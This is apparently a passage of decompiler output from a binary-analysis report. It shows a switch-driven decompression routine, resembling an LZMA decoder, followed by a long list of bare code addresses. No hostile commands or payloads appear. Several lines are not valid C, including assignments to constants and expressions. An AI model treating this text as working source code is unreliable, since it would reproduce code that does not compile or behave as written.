									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406bfe
0x00406bfe
0x00406c03
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406c05
0x00406c05
0x00406c09
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c2a
0x00406c31
0x00406c34
0x00406c3f
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4e
0x00406c6c
0x00406c6e
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e93
0x00406e96
0x00406e39
0x00406e3f
0x00000000
0x00000000
0x00000000
0x00406e98
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e36
0x00000000
0x00406e36
0x00406c50
0x00406c50
0x00406c53
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d42
0x00406d45
0x00406cbc
0x00406cbc
0x00406cc2
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dcf
0x00406dd2
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d72
0x00406d72
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddd
0x00406ddd
0x00406de0
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x00406cce
0x00000000
0x00000000
0x00000000
0x00406d4b
0x00406c97
0x00406c9b
0x00407408
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb9
0x00000000
0x00406cb9
0x00406d45
0x00406c4e
0x00406a82
0x00406a82
0x00406a8b
0x00407499
0x00407499
0x00000000
0x00407499
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
